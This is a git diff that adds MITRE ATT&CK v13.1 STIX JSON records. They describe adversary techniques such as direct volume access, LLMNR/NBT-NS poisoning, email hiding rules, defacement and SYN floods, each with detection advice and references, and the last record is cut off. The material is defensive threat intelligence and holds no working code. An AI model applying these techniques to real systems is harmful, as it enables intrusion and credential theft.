@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--689a2bab-e2bd-4b20-ab17-9e615a2c31c1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "type": "attack-pattern", + "created": "2017-05-31T21:30:20.934Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1006", + "url": "https://attack.mitre.org/techniques/T1006" + }, + { + "url": "http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin", + "description": "Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.", + "source_name": "Hakobyan 2009" + }, + { + "url": "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1", + "description": "Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.", + "source_name": "Github PowerSploit Ninjacopy" + } + ], + "modified": "2021-02-09T14:09:00.753Z", + "name": "Direct Volume Access", + "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. 
(Citation: Github PowerSploit Ninjacopy)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Drive: Drive Access" + ], + "x_mitre_defense_bypassed": [ + "File monitoring", + "File system access controls" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a.json new file mode 100644 index 0000000000000000000000000000000000000000..b1c400d64c115ce39ce90f576fe78a5478bf51ca --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a.json 
@@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--812ec80a-7626-4135-bcd4-9d2c5e36f689", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Stefan Kanthak", + "Travis Smith, Tripwire" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", + "type": "attack-pattern", + "created": "2017-05-31T21:30:43.063Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1044", + "url": "https://attack.mitre.org/techniques/T1044" + }, + { + "external_id": "CAPEC-17", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/17.html" + }, + { + "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/", + "description": "Kugler, R. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", + "source_name": "Mozilla Firefox Installer DLL Hijack" + }, + { + "url": "http://seclists.org/fulldisclosure/2015/Dec/34", + "description": "Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege. Retrieved March 10, 2017.", + "source_name": "Seclists Kanthak 7zip Installer" + } + ], + "modified": "2020-03-19T15:11:39.627Z", + "name": "File System Permissions Weakness", + "description": "Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. 
If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.\n\n### Services\n\nManipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.\n\n### Executable Installers\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. 
This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "x_mitre_effective_permissions": [ + "SYSTEM", + "User", + "Administrator" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff.json new file mode 100644 index 0000000000000000000000000000000000000000..8e680fe26bac2568a3bed404e9a82a45c9e3fb99 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff.json 
@@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--65b1e352-5477-4c07-b04e-a2155897c182", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T20:42:20.079Z", + "name": "Email Hiding Rules", + "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. 
For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Dor Edry, Microsoft", + "Liran Ravich, CardinalOps" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Application Log: Application Log Content", + "File: File Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "created": "2021-06-07T13:20:23.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/008", + "external_id": "T1564.008" + }, + { + "source_name": "MacOS Email Rules", + "description": "Apple. (n.d.). 
Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.", + "url": "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac" + }, + { + "source_name": "Microsoft BEC Campaign", + "description": "Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/" + }, + { + "source_name": "Microsoft Mail Flow Rules 2023", + "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.", + "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + }, + { + "source_name": "Microsoft Inbox Rules", + "description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.", + "url": "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59" + }, + { + "source_name": "Microsoft New-InboxRule", + "description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps" + }, + { + "source_name": "Microsoft Set-InboxRule", + "description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps" + }, + { + "source_name": "Microsoft Cloud App Security", + "description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. 
Retrieved June 7, 2021.", + "url": "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3.json new file mode 100644 index 0000000000000000000000000000000000000000..b16775670d01717e765450572e235fda81bd3152 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3.json 
@@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--3baabc4b-746a-452d-bf27-6146a667be97", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "type": "attack-pattern", + "created": "2020-02-20T14:34:08.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1491.002", + "url": "https://attack.mitre.org/techniques/T1491/002" + }, + { + "source_name": "FireEye Cyber Threats to Media Industries", + "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf", + "description": "FireEye. (n.d.). Retrieved April 19, 2019." + }, + { + "source_name": "Kevin Mandia Statement to US Senate Committee on Intelligence", + "url": "https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf", + "description": "Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019." + }, + { + "source_name": "Anonymous Hackers Deface Russian Govt Site", + "url": "https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/", + "description": "Andy. (2018, May 12). \u2018Anonymous\u2019 Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019." + }, + { + "source_name": "Trend Micro Deep Dive Into Defacement", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf", + "description": "Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). 
A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019." + } + ], + "modified": "2022-03-25T19:34:37.539Z", + "name": "External Defacement", + "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system\u2019s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. 
Web Application Firewalls may detect improper inputs attempting exploitation.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "File: File Modification" + ], + "x_mitre_impact_type": [ + "Integrity" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0.json new file mode 100644 index 0000000000000000000000000000000000000000..f4e1a5b8ea4ecf998339b6bfbd03cecf41944d9d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0.json 
@@ -0,0 +1,95 @@ +{ + "type": "bundle", + "id": "bundle--447580ea-aa6b-41e7-a918-2b2915445070", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Eric Kuehn, Secure Ideas", + "Matthew Demaske, Adaptforward" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "type": "attack-pattern", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1171", + "url": "https://attack.mitre.org/techniques/T1171" + }, + { + "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution", + "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.", + "source_name": "Wikipedia LLMNR" + }, + { + "url": "https://technet.microsoft.com/library/cc958811.aspx", + "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.", + "source_name": "TechNet NetBIOS" + }, + { + "source_name": "byt3bl33d3r NTLM Relaying", + "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html", + "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019." + }, + { + "source_name": "Secure Ideas SMB Relay", + "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html", + "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019." + }, + { + "url": "https://github.com/nomex/nbnspoof", + "description": "Nomex. (2014, February 7). NBNSpoof. 
Retrieved November 17, 2017.", + "source_name": "GitHub NBNSpoof" + }, + { + "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response", + "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.", + "source_name": "Rapid7 LLMNR Spoofer" + }, + { + "url": "https://github.com/SpiderLabs/Responder", + "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", + "source_name": "GitHub Responder" + }, + { + "url": "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning", + "description": "Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.", + "source_name": "Sternsecurity LLMNR-NBTNS" + }, + { + "url": "https://github.com/Kevin-Robertson/Conveigh", + "description": "Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.", + "source_name": "GitHub Conveigh" + } + ], + "modified": "2020-02-11T19:09:48.452Z", + "name": "LLMNR/NBT-NS Poisoning and Relay", + "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. 
The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3.json new file mode 100644 index 0000000000000000000000000000000000000000..4a6512a5539538cdec2b7adb122676dc7657de6b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--e9bc6f78-a0c3-497c-9f6a-b9c936e91825", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "type": "attack-pattern", + "created": "2020-10-02T15:59:11.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.005", + "url": "https://attack.mitre.org/techniques/T1590/005" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:31:05.302Z", + "name": "IP Addresses", + "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. 
IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7.json new file mode 100644 index 0000000000000000000000000000000000000000..74a61d374576afc2bccb45505dd60893d0659e97 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--b0da6e45-e3c2-4027-b995-69e52adbe67d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:51.289Z", + "name": "OS Exhaustion Flood", + "description": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. 
This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Sensor Health: Host Status", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "created": "2020-02-20T15:27:18.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1499/001", + "external_id": "T1499.001" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. 
